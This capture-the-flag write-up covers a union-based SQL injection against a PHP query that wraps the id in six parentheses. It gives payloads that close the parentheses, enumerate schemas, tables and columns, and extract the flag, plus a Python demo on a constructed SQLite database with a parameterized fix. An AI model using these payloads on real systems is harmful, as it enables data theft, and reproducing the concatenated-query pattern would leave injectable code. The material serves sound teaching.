The challenge gives a hint:
<?php
$sql = "SELECT username,password FROM users WHERE id = ".'(((((('.$_GET["id"].'))))))';
$result = $conn->query($sql);
Try id=1 and id=2 directly; probing the column count with order by, nothing comes back at 3, which confirms the query has two columns.
Close the six parentheses and append union select 1,2#; here both 1 and 2 are echoed back normally. Then:
-1))))))union select group_concat(schema_name),2 from information_schema.schemata#
to list the database names, which gives:
information_schema,mysql,ctftraining,performance_schema,test,ctf
Try ctftraining first.
Query the table names: -1))))))union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'#
This finds a table named flag; next query the column names of flag:
-1))))))union select group_concat(column_name),2 from information_schema.columns where table_schema='ctftraining' and table_name='flag'#
The column in flag is also named flag, so query it directly to get the flag:
-1))))))union select group_concat(flag),2 from ctftraining.flag#
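The whole chain above, as an added example that is not part of the original writeup: it reproduces the PHP template (six parentheses around an unescaped id) in Python, runs the same union-based steps against a constructed in-memory SQLite stand-in for the ctftraining schema, and shows the parameterized query that defeats the payload. Because SQLite has no information_schema and no # comment, the table-listing payload is adapted to sqlite_master and the comment to --; the users/flag tables and their contents are made up for the demo.

```python
import sqlite3

# Same string template as the challenge's PHP: the id is wrapped in six
# parentheses, so any payload has to close ))))))  before it can add SQL.
TEMPLATE = "SELECT username,password FROM users WHERE id = (((((({id}))))))"


def build_query(user_id: str) -> str:
    """Concatenate exactly like the PHP does. No escaping: the vulnerable path."""
    return TEMPLATE.format(id=user_id)


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the ctftraining database (not the real one)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'guest', 'guest');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('flag{constructed_example}');
        """
    )
    return conn


def run_vulnerable(conn: sqlite3.Connection, user_id: str):
    return conn.execute(build_query(user_id)).fetchall()


def probe_column_count(conn: sqlite3.Connection, max_cols: int = 10) -> int:
    """Step 1 of the writeup: ORDER BY n works while n <= column count; the
    first n that fails tells us the count (the writeup saw it fail at 3)."""
    for n in range(1, max_cols + 1):
        try:
            run_vulnerable(conn, f"1)))))) ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return max_cols


def list_tables(conn: sqlite3.Connection) -> str:
    """Step 2: the information_schema.tables query, adapted to sqlite_master."""
    payload = ("-1)))))) UNION SELECT group_concat(name),2 "
               "FROM sqlite_master WHERE type='table' -- ")
    return run_vulnerable(conn, payload)[0][0]


def read_flag(conn: sqlite3.Connection) -> str:
    """Step 3: same as the final payload, -1)))))) union select group_concat(flag),2 from flag."""
    payload = "-1)))))) UNION SELECT group_concat(flag),2 FROM flag -- "
    return run_vulnerable(conn, payload)[0][0]


def run_parameterized(conn: sqlite3.Connection, user_id):
    """The fix: bind id as a value. The parentheses stay in the SQL text and the
    payload is compared against the id column as one literal, matching nothing."""
    sql = "SELECT username,password FROM users WHERE id = ((((((?))))))"
    return conn.execute(sql, (user_id,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print("columns:", probe_column_count(db))
    print("tables:", list_tables(db))
    print("flag:", read_flag(db))
    print("parameterized, same payload:",
          run_parameterized(db, "-1)))))) UNION SELECT group_concat(flag),2 FROM flag -- "))
```

The injected query reads `... WHERE id = ((((((-1)))))) UNION SELECT ... -- ))))))`: the leading `-1))))))` balances the template's parentheses, the union supplies the two columns the probe found, and the trailing comment swallows the six closing parentheses the PHP appends.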
